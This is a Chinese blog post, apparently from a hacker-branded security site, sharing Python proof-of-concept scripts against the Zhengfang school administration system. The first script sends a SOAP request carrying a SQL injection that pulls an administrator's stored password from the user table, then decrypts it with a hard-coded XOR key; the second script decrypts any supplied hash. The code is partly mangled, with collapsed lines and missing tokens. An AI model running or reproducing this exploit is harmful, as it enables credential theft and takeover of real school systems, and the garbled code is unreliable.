注:本博客仅供技术研究。如果其信息用于其他目的,用户将承担全部法律和连带责任。本博客不承担任何法律和连带责任。请遵守中华人民共和国安全法
黑客19 – 引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!
最近有时间优化几个正方教务系统。poc,当然,下面的未优化版本不会让读者感到孤独,所以核心功能可以正常使用
import urllib2 import sys,httplib ,redef SendRtx(target,username): SENDTPL = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo"> <xh xsi:type="xsd:string">222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='%s</xh> <xnxq xsi:type="xsd:string">2013-2014-1</xnxq> <strKey xsi:type="xsd:string">KKKGZ2312</strKey> </q1:GetStuCheckinInfo> </soap:Body></soap:Envelope> SoapMessage = SENDTPL % (username) webservice = httplib.HTTP(target) webservice.putrequest("POST","/service.asmx") webservice.putheader("Host",target) webservice.putheader("User-Agent","Python Post") webservice.putheader("Content-type","text/xml; charset=\"UTF-8\"") webservice.putheader("Content-length","%d" % len(SoapMessage)) webservice.putheader("SOAPAction","\"http://www.zf_webservice.com/GetStuCheckinInfo \"") webservice.endheaders() webservice.send(SoapMessage) # get the response statuscode,statusmessage,header = webservice.getreply() #print "Response: ",statuscode,statusmessage #print "headers: ",header return re.findall(u"(?<=\<xh xsi\:type=\"xsd:string\"\>).*?(?=\</xh\>)",webservice.getfile().read(),re.DOTALL)[0] def crack_zhengfang( pwdhash,key="Encrypt01" ): len_passwd = len( pwdhash ) len_key = len( key ) pwdhash = pwdhash[: len_passwd/2][::-1] pwdhash[len_passwd/2 :][::-1] passwd = Pos = 0 for i in xrange( len_passwd ): Pos %= len_key Pos = strChar = pwdhash[i] KeyChar = key[Pos-1] ord_strChar = ord( strChar ) ord_KeyChar = ord( KeyChar ) if not 32 <= ( ord_strChar ^ ord_KeyChar ) <= 126 or not 0 <= ord_strChar <= 255: passwd = strChar else: passwd = chr( ord_strChar ^ ord_KeyChar ) return passwddef getIp(domain): import socket myaddr = socket.getaddrinfo(domain,'http')[0][4][0] return myaddrif __name__ == '__main__ if len(sys.argv) != 2: print "Usage: zfsql.py URL" sys.exit(1) else: print "Password:",crack_zhengfang( pwdhash=SendRtx(getIp(sys.argv[1]),"jwc01"),key="Encrypt01" )import sysdef crack_zhengfang( pwdhash,key="Encrypt01" ): len_passwd = len( pwdhash ) len_key = len( key ) pwdhash = pwdhash[: len_passwd/2][::-1] pwdhash[len_passwd/2 :][::-1] passwd = '' Pos = 0 for i in xrange( len_passwd Pos %= len_key Pos = 1 strChar = pwdhash[i] KeyChar = key[Pos-1] ord_strChar = ord( strChar ) ord_KeyChar = ord( KeyChar ) if not 32 <= ( ord_strChar ^ ord_KeyChar ) <= 126 or not 0 <= ord_strChar <= passwd = strChar else: passwd = chr( ord_strChar ^ ord_KeyChar ) return passwdif __name__ == '__main__ if len(sys.argv) != 2: print "Usage: crackZF.py passwdhash" sys.exit(1) else: print "Password:",crack_zhengfang(pwdhash=sys.argv[1],key="Encrypt01")